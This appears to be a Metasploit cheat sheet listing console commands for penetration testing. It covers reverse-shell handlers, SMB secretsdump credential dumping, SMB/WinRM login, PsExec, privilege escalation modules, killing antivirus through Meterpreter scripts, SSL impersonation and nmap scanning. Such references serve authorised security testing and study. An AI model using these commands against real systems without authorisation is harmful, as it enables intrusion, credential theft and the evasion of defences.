Core
Modules - Post
Modules - Auxiliary
Plugins
Meterpreter
Database
Modules - Privilege Escalation
msf> search platform:windows port:135 target:XP type:exploit
#list available keywords
msf>help search
Modules
#navigate through different active modules
use exploit/multi/handler
#push module on stack
pushm
use ...
#list stack
listm
[*] Module stack:
[1]     post/multi/recon/local_exploit_suggester
[0]     exploit/multi/handler
#go to previous module and delete it from the stack
popm
Jobs
#List Jobs
jobs -l
#Kill all Jobs
jobs -K
#Kill single Job by ID
jobs -k 1

Run in Background

use exploit/multi/handler
run -p windows/shell/reverse_tcp lhost=0.0.0.0 lport=443 -j

RHosts

set RHOSTS file:/home/user/iplist.txt

Impacket Secretsdump

use scanner/smb/impacket/secretsdump
set RHOSTS 192.168.1.1
set SMBDOMAIN domain
set SMBUSER user
set SMBPASS pass

SMB Login

use scanner/smb/smb_login
auxiliary(scanner/smb/smb_login) > run CreateSession=true RHOSTS=172.14.2.164 RPORT=445 SMBDomain=windomain.local SMBPass=password SMBUser=username
sessions -i 1

Custom SSL

Run impersonate_ssl Module and configure the handler:

set HandlerSSLCert /home/path/cert.pem
set StagerVerifySSLCert true
run

Sessions

#List Sessions
sessions
#Select Session
sessions -i 1

Modules

List all modules

load -l

Run module

meterpreter > run scriptname
Scriptname Action
checkvm check if target system is a VM
getcountermeasure checks security settings
getgui try to enable RDP
get_local_subnets list local subnets
gettelnet enable telnet
hostsedit edit the hosts file
killav try to kill antivirus
remotewinenum enumerate system information
scraper enumerate more system information
winenum detailed windows enumeration

WinRM Login

use scanner/winrm/winrm_login
run CreateSession=true RHOSTS=172.14.2.164 SMBDomain=windomain.local SMBPass=password SMBUser=username

Impersonate SSL

use auxiliary/gather/impersonate_ssl
set RHOSTS www.google.com
set ADD_CN true
set ADD_SAN true
run

Alias

load alias
alias s set
alias sg setg

Wiki

load wiki
Wiki Commands
=============
dokuwiki          Outputs data from the current workspace in dokuwiki markup.
mediawiki         Outputs data from the current workspace in mediawiki markup.

Service

use exploit/windows/local/service_permissions
run lhost=0.0.0.0 lport=12222

UAC Enumeration

use post/windows/gather/win_privs
set SESSION 1

Local Exploit Suggester

use post/multi/recon/local_exploit_suggester
set SESSION 1

PsExec

use exploit/windows/smb/psexec
set rhost 127.0.0.1
set smbuser mega-admin
set smbpass p4ss
run

Upgrade Shell to Meterpreter

use post/multi/manage/shell_to_meterpreter
set SESSION 1

Initialize a database with msfdb init. A database with user and password will be generated.

Database nmap

msf6 > db_connect user:pass@localhost/msf
msf6 > db_status
msf6 > workspace
msf6 > workspace -a new_ws
msf6 > db_nmap -sP 192.168.2.0/24
msf6 > hosts
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > hosts -R
msf6 auxiliary(scanner/portscan/tcp) > run
Interactive Graph
Table Of Contents
Search
Modules
Jobs
Run in Background
RHosts
Impacket Secretsdump
SMB Login
Custom SSL
Sessions
Modules
WinRM Login
Impersonate SSL
Alias
Wiki
Service
UAC Enumeration
Local Exploit Suggester
PsExec
Upgrade Shell to Meterpreter
Database nmap